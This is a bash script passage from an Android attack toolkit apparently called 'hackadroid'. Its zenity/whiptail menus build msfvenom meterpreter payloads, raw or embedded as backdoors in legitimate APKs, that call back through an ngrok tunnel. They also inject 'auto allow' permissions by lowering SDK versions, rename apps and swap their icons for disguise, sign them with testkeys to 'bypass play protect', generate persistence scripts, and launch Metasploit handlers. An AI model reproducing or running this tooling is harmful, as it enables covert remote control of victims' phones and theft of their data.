	        if (whiptail --title "MIXPLORER" --yesno "DO YOU WANT TO KNOW THE PROCESS OF SIGNING APK MANUALLY" 8 78); then
		        sudo -u $user_id -H firefox --new-tab ${mixplorer_url} > /dev/null 2>&1
			thankyou			
		else	                                     
		        thankyou
			exit 1
		fi
		break;

	elif [ $option = 05 ] || [ $option = 5 ]
        then
		
		apk=$(zenity --title "select apk you wish to decompile" --file-selection --multiple --file-filter "*.apk" --filename "${HOME}/Desktop"  2> /dev/null)
	        decompile_file=$(zenity --title "PAYLOAD OUTPUT" --text "enter name of decompile file" --entry --entry-text "decompile" --width 270)				
		if [ -d ${decompile_file} ]; then			
		        zenity --error  --width=300 --height=100 --text "Decompile file ${decompile_file} already exist" 2> /dev/null
		        sleep 1
		        ask_user=$(zenity --question --title "CONFIRM" --text "Do you want me to delete ${decompile_file} and proceed?" --width 300 --height 100 2> /dev/null)			
		        if [ $? -eq 0 ];then				
		                rm -rf ${decompile_file}
		                sleep 1.5
		                zenity --info --title "Notification" --width=300 --height=100 --text "Existing file successfully removed press ok to proceed"
			else				
		                exit 0
			fi
		fi
		launch="Decompiling ${apk}"
		splashdown="Decompiled ${apk}"	        
		(xterm -T "DECOMPILE PAYLOAD" -e "apktool d -f ${apk} -o ${decompile_file} 2>&1 | tee ${error_log}") & spinner;echo -e"\e[om"
		success=$(realpath ${decompile_file})
		if [ -d "${decompile_file}" ];then			
	                notify-send -t 30000 'hackadroid' "apk sucessfully decompile" --icon=${hackadroid_icon}
		        sleep 1
		        zenity --info --title "Notification" --width=300 --height=100 --text "Apk has been successfully decompile and saved as ${success}"
		else			
		        zenity --error  --width=300 --height=100 --text "unable to decompile apk try again !! or open issue on github"
		        github_issue
		fi		
		thankyou
		break;
	   
	elif [ $option = 06 ] || [ $option = 6 ]
        then
		
		apk=$(zenity --title "select file you wish to recompile" --file-selection --directory --filename "${HOME}/Desktop"  2> /dev/null)
	        recompile_file=$(zenity --title "PAYLOAD OUTPUT" --text "enter name of recompile file" --entry --entry-text "recompile.apk" --width 270)		
		if [ -f ${recompile_file} ]; then			
		        zenity --error  --width=300 --height=100 --text "Recompile file ${recompile_file} already exist" 2> /dev/null
		        sleep 1
		        ask_user=$(zenity --question --title "CONFIRM" --text "Do you want me to delete ${recompile_file} and proceed?" --width 300 --height 100 2> /dev/null)
		        if [ $? -eq 0 ];then				
		                rm -rf ${recompile_file}
		                sleep 1.5
		                zenity --info --title "Notification" --width=300 --height=100 --text "Existing file successfully removed press ok to proceed"
			else				
		                exit 0
			fi
		fi		
		launch="Recompiling ${apk}"
		splashdown="Recompiled ${apk}"	        
		(xterm -T "RECOMPILE PAYLOAD" -e "apktool b -f -d ${apk} -o ${recompile_file} 2>&1 | tee ${error_log}") & spinner;echo -e "\e[0m"
		success=$(realpath ${recompile_file})
		if [ -f "${recompile_file}" ];then			
	                notify-send -t 30000 'hackadroid' "apk sucessfully recompile" --icon=${hackadroid_icon}
		        sleep 1
		        zenity --info --title "Notification" --width=300 --height=100 --text "Apk has been successfully recompile and saved as ${success}"
		else	           
		        zenity --error  --width=300 --height=100 --text "unable to recompile apk try again !! or open issue on github"
		        github_issue
		fi		  
		thankyou
		break;

        elif [ $option = 07 ] || [ $option = 7 ]
        then
		
		zen=$(zenity --question --title "PERSISTENT PAYLOAD SCRIPT" --text "generate default script ?" --width 300 --height 100 2> /dev/null)
		if [ $? -eq 0 ];then
			launch="Generating raw persistent script"
			splashdown="Generated raw persistent script"
			sleep 5 & spinner;echo -e "\e[0m"
		        persistent_script		        
		        success=$(realpath persistent.sh)
		        notify-send -t 120000 'hackadroid' "default persistent script sucessfully generated" --icon=/root/Desktop/hackadroid/icon/download.png
		        sleep 1
		        zenity --info --title "Notification" --width=300 --height=100 --text "persistent script has been generated successfully and saved as ${success}"
		else	
		        time=$(zenity --title="PERSISTENT PAYLOAD USER DEFINE" --text "enter time interval : for 60 sec just enter 60" --entry-text "60" --entry --width 300 --height 150 2> /dev/null)
                        launch="Generating raw persistent script"
			splashdown="Generated raw persistent script"
			sleep 5 & spinner;echo -e "\e[0m"
			persistent_script
		        sed -i "s/sleep.*/sleep ${time}/g" persistent.sh		        
		        success=$(realpath persistent.sh)
		        notify-send -t 30000 'hackadroid' "user persistent script successfully generated" --icon=$hackadroid_icon
		        sleep 1
		        zenity --info --title "Notification" --width=300 --height=100 --text "user persistent script has been successfully generated and saved as ${success}"
		fi
		auto_listner=$(zenity --question --title "AUTO LISTNER" --text "you want me to run auto listner and make payload auto persistent now ? " --width 300 --height 100 2> /dev/null)
		if [ $? -eq 0 ];then			
		        user_ip
		        user_lhost
		        user_lport
		        user_payload
		        zen_notify=$(zenity --info --title "Notification" --width=300 --height=100 --text "type 'shell' when connected to device and copy ( sh persistent.sh ) this and paste to terminal after it ") 2> /dev/null
		        ## meterpreter raw
		        auto_meterpreter
		        ## multi handler_raw
		        start_listner
                        sed -i '/set LPORT.*/ a set AutoRunScript meterpreter.rc' auto_handler.rc
		        run_exploit_pers
		else
		        thankyou
		        exit 1
		fi
		thankyou
		clean
		break;

	elif [ $option = 08 ] || [ $option = 8 ]
	then
		
		persistent_apk=$(zenity --title "select embeded apk to generate persistent script" --file-selection --file-filter "*.apk" --multiple --filename="$HOME/Desktop"  2> /dev/null)
		warn=$(zenity --warning --width=350 --height=140 --text "For embeded payload enter time interval more than 1800  i.e.  30 min which mean apk will start its activity again in 30 min, else apk will start crashing"  2> /dev/null )
		time=$(zenity --title="PERSISTENT PAYLOAD USER DEFINE" --text "enter time interval : for 1800 sec just enter 1800" --entry-text "1800" --entry --width 300 --height 150 2> /dev/null)
	      	package=$(aapt dump badging ${persistent_apk} | awk '/package/{gsub("name=|'"'"'","");  print $2}')
		activity=$(aapt dump badging ${persistent_apk} | awk '/activity/{gsub("name=|'"'"'","");  print $2}')
		launch="Generating a Embeded Persistent Script"
		splashdown="Generated a Embeded Persistent Script"
		sleep 5 & spinner;echo -e "\e[0m"
		persistent_script
		sed -i "s%do am.*%do am start --user 0 -a android.intent.action.MAIN -n ${package}/${activity}%g; s%sleep.*%sleep $time%g" persistent.sh
		success=$(realpath persistent.sh)
		if [ -f persistent.sh ];then			
		        notify-send -t 30000 'hackadroid' "embeded persistent script sucessfully generated" --icon=${hackadroid_icon}
		        sleep 1
		        zenity --info --title "Notification" --width=300 --height=100 --text "embeded persistent script has been generated successfully and saved as ${success} "
		else	          
		        zenity --error  --width=300 --height=100 --text "unable to inject persistent script in apk !! or open issue on github"
		        github_issue		
		        exit 1
		fi		
		sleep 1
                auto_listner=$(zenity --question --title "AUTO LISTNER" --text "you want me to run auto listner for you and make payload auto persistent now ? " --width 300 --height 100 2> /dev/null) 
		if [ $? -eq 0 ];then			
		        user_ip
		        user_lhost
		        user_lport
		        user_payload
		        whiptail --title "HACKADROID" --msgbox "type 'shell' once connected to device and copy ( sh persistent.sh ) this and paste to the terminal after it." 8 78
		        ##auto meterpreter
		        auto_meterpreter
		        ##multi handler
		        start_listner
                        sed -i '/set LPORT.*/ a set AutoRunScript meterpreter.rc' auto_handler.rc
		        run_exploit_pers
		else	          
		        thankyou
	                exit 1
		fi		 
		thankyou
		clean
	        break;

        elif [ $option = 09 ] || [ $option = 9 ]
        then
			         
	        perm_dir=$(mktemp -d)
		rm -rf ${perm_dir}
		apk=$(zenity --title "select payload to embed auto allow permissions" --file-selection --file-filter "*.apk" --multiple --filename "${HOME}/Desktop"  2> /dev/null) 
		payload_name=$(zenity --title "PAYLOAD NAME" --text "enter payload output name" --entry --entry-text "hackadroid.apk" --width 270)
		launch="Injecting auto allow script in ${apk}"
		splashdown="Injected auto allow script in ${apk}"
		(xterm -T "DECOMPILING PAYLOAD" -e "apktool d -r -s ${apk} -o ${perm_dir} 2>&1 | tee ${error_log}") & spinner;echo
		launch="Rebuilding apk with auto allow permissions"
		splashdown="Rebuilded apk with auto allow permissions"
	        for i in minSdkVersion targetSdkVersion; do			
		        sed -i "s/$i.*/$i: '22'/" ${perm_dir}/apktool.yml
		done
		(xterm -T "RECOMPILING PAYLOAD" -e "apktool b -f -d ${perm_dir} -o ash.apk 2>&1 | tee ${error_log}") & spinner;echo
          	rm -rf ${perm_dir}
		launch="Signing an ${apk} with testkey"
	        splashdown="Signed an ${apk} with testkey"
                java -jar ${sign_jar}/signapk.jar ${sign_jar}/testkey.x509.pem ${sign_jar}/testkey.pk8 ash.apk ${payload_name}
	        sleep 8 & spinner;echo -e "\e[0m"
		rm -rf ash.apk
		success=$(realpath ${payload_name})
		if [ -f "${payload_name}" ];then			
		        notify-send -t 30000 'hackadroid' "Auto permission successfully injected" --icon=${hackadroid_icon}
		        sleep 1
		        zenity --info --title "Notification" --width=300 --height=100 --text "Auto permission as been successfully embed in payload and saved as ${success}"
		else			
		        zenity --error  --width=300 --height=100 --text "unable to embed auto permission in payload try again !! or open issue on github"
		        github_issue
		fi
		arch
		thankyou
		break;

        elif [ $option = 10 ]
        then
	       	
	       #change application name and icon
	       original_apk=$(zenity --title "select payload to change apk name & icon" --file-selection --file-filter "*.apk" --multiple --filename="${HOME}/Desktop"  2> /dev/null)
               user_output_payload_name
     	       change_name_icon_dir=$(mktemp -d)
	       rm -rf ${change_name_icon_dir}	              	       
	       select_icon=$(zenity --title "CHOOSE YOUR APP ICON " --filename=${hackadroid_main}/icon --file-selection --file-filter "*.png" --text "select your image" 2> /dev/null)
	       app_name=$(zenity --title "APPLICATION NAME" --text "enter name you wish to give to your app" --entry --entry-text "anyname" --width 270 --height 120 2> /dev/null)
	       launch="Decompiling original apk"
	       splashdown="Decompiled original apk"
	       (xterm -T "CHANGE APP NAME & ICON" -e "apktool d -f ${original_apk} -o ${change_name_icon_dir} 2>&1 | tee ${error_log}") & spinner;echo -e "\e[0m"
	       change_name='    <application android:label="@string/app_name">'
	       change_icon='    <application android:label="@string/app_name" android:icon="@drawable/main_icon">'
	       sed -i "s|${change_name}|${change_icon}|g" ${change_name_icon_dir}/AndroidManifest.xml 2>&1
	       sed -i "s|MainActivity|${app_name}|g" ${change_name_icon_dir}/res/values/strings.xml 2>&1
	       if [ ! -d "${change_name_icon_dir}/res/drawable" ];then		       
	               mkdir ${change_name_icon_dir}/res/drawable
	       fi	       
	       cp -R ${select_icon} ${change_name_icon_dir}/res/drawable/main_icon.png
	       launch="Applying user settings on original apk"
	       splashdown="Changed original apk name and icon "
	       (xterm -T "REBUILD APK" -e "apktool b -f -d ${change_name_icon_dir} -o ash.apk 2>&1 | tee ${error_log}") & spinner; printf "\n"
	       rm -rf ${change_name_icon_dir}
	       echo
	       java -jar ${sign_jar}/signapk.jar ${sign_jar}/testkey.x509.pem ${sign_jar}/testkey.pk8 ash.apk ${payload_name}
	       rm -rf ash.apk
	       success=$(realpath ${payload_name})	     
	       if [ -f "${payload_name}" ];then		       
	               notify-send -t 30000 'hackadroid' "apk name & icon successfully changed" --icon=${hackadroid_icon}
		       sleep 1
		       zenity --info --title "Notification" --width=300 --height=100 --text "Name and icon of apk has been successfully changed and save as ${success}"
	       else
		       zenity --error  --width=300 --height=100 --text "unable to change apk name and icon !! or open issue on github"
		       github_issue
	       fi
	       arch
	       thankyou
	       break;

        elif [ $option = 11 ]
        then
			      
	        user_ip
		user_lhost
		user_lport
		user_payload
		start_listner
		run_exploit
		thankyou
		clean
		break;

        elif [ $option = 12 ]
        then
		
	        ngrok="$(ps -efw | grep ngrok | grep -v grep | awk '{print $2}')"
                kill -9 $ngrok > /dev/null 2>&1
		kill_msf="$(lsof -i :4567 | awk '{print $2}' | grep -v "PID")"
		kill -9 $kill_msf > /dev/null 2>&1
                gnome-terminal --quiet --geometry '-3+3' -e 'sh -c "resize -s 15 75; ngrok start --all; exec bash"'	       
                launch="Starting Hackadroid over wan"
		splashdown="Started hackadroid over wan"
		sleep 15 & spinner;echo
		rport="$(curl --silent --max-time 10 --connect-timeout 5 --show-error http://127.0.0.1:4040/api/tunnels | sed -nE 's/.*public_url":"tcp:..([^"]*).*/\1/p' | sed 's/^.\{15\}//g')";
		ask=$(whiptail --title "CREATE PAYLOAD" --menu "SELECT PAYLOAD YOU WISH." 20 60 13 \
                "1" "RAW PAYLOAD" \
                "2" "EMBEDED PAYLOAD " \
                "3" "EXIT" 3>&1 1>&2 2>&3)
		case $ask in

			1)				
		                user_payload
		                user_output_payload_name
		                launch="Injecting permission in apk"
		                splashdown="Injected permission in apk"
	                        sleep 5 & spinner;echo		        
                                launch="Generating a raw paylaod"
		                splashdown="Generated a raw payload"
		                (msfvenom -p ${android_payload} LHOST=0.tcp.ngrok.io LPORT=${rport} --platform android --arch dalvik AndroidMeterpreterDebug=true AndroidWakelock=true -o hack.apk > ${error_log} 2>&1 /dev/null 2>&1) & spinner;echo -e "\e[0m"
				;;

			2)				
	                        user_payload
		                embed_payload
		                user_output_payload_name
		                launch="Injecting permission in apk"
		                splashdown="Injected permission in apk"	               
	                        sleep 5 & spinner;echo
                                launch="Generating embed backdoor paylaod"
		                splashdown="Generated embeded backdoor payload"		                
		                (xterm -T "EMBED PAYLOAD" -e "sudo msfvenom -x ${bind_apk} -p ${android_payload} LHOST=0.tcp.ngrok.io LPORT=${rport} --platform android --arch dalvik AndroidMeterpreterDebug=true AndroidWakelock=true -o hack.apk 2>&1 | tee ${error_log}") & spinner;echo -e "\e[0m"
				;;

			3)
				thankyou
				exit 1
				;;				
		esac		
		# bypass play-protect automatically
		ask_sign=$(zenity --question --title "SIGN AN APK" --text "Bypass playprotect for you ??" --width 300 --height 100 2> /dev/null)
		if [ $? -eq 0 ];then
                        launch="Bypassing play protect in apk"
		        splashdown="Bypassed play protect in apk"
	                sleep 5 & spinner;echo -e "\e[0m"		                               			
                        java -jar ${sign_jar}/signapk.jar ${sign_jar}/testkey.x509.pem ${sign_jar}/testkey.pk8 hack.apk ${payload_name}
			rm -rf hack.apk
		else
			mv hack.apk ${payload_name}
			rm -f hack.apk
		fi
                success=$(realpath ${payload_name})
		if [ -f "${payload_name}" ];then			
	                notify-send -t 30000 'hackadroid' "apk sucessfully build" --icon=${hackadroid_icon}
		        sleep 1
		        zenity --info --title "Notification" --width=300 --height=100 --text "Apk has been successfilly build and save as ${success}"
		else
		        zenity --error  --width=300 --height=100 --text "unable to build apk try again !! or open issue on github"
	                github_issue
		fi
		arch
		start_listner
		sed -i "s/set LHOST.*/set LHOST 0.0.0.0/g" auto_handler.rc
		sed -i "s/set LPORT.*/set LPORT 4567/g" auto_handler.rc
		run_exploit		                								 
		thankyou
		clean
		break;

        elif [ $option = 13 ]
        then
		
                zenity --warning --width=400 --height=160 --text "If you use apksigner, zipalign must only be performed before the APK file has been signed. If you sign your APK using apksigner and make further changes to the APK, its signature is invalidated. If you use jarsigner, zipalign must only be performed after the APK file has been signed."     
	        zipalign_apk=$(zenity --title "select apk to be zipalign" --file-selection --file-filter "*.apk" --multiple --filename="$HOME/Desktop"  2> /dev/null)
		launch="Zipaligning ${zipalign_apk}"
		splashdown="Zipaligned ${zipalign_apk}"
                payload_name=$(zenity --title "APK NAME" --text "set output apk name" --entry --entry-text "zipalign.apk" --width 270 --height 120 2> /dev/null);
		(xterm -T "ZIPALIGN APK" -e "zipalign -v 4 $zipalign_apk $payload_name 2>&1 | tee ${error_log} && sleep 4") & spinner ; printf "\n"
		success=$(realpath ${payload_name})
		if [ -f "${payload_name}" ];then			
	                notify-send -t 30000 'hackadroid' "apk sucessfully zipalign" --icon=${hackadroid_icon}
		        sleep 1
		        zenity --info --title "Notification" --width=300 --height=100 --text "Apk has been successfilly zipalign and save as ${success}"
		else			
		        zenity --error  --width=300 --height=100 --text "unable to zipalign apk try again !! or open issue on github"
		        github_issue
		fi
		arch
		thankyou
		break;

        elif [ $option = 14 ]
        then
		
                check_jdx
	        jadx-gui > /dev/null 2>&1
		sleep 0.4
		thankyou
	        break;

        elif [ $option = quit ] || [ $option = exit ]
        then 
				
                stop_hackadroid
		sleep 0.4
		thankyou
	        break;

	else

		error_msg "error option try again"
		sleep 2
	fi
done

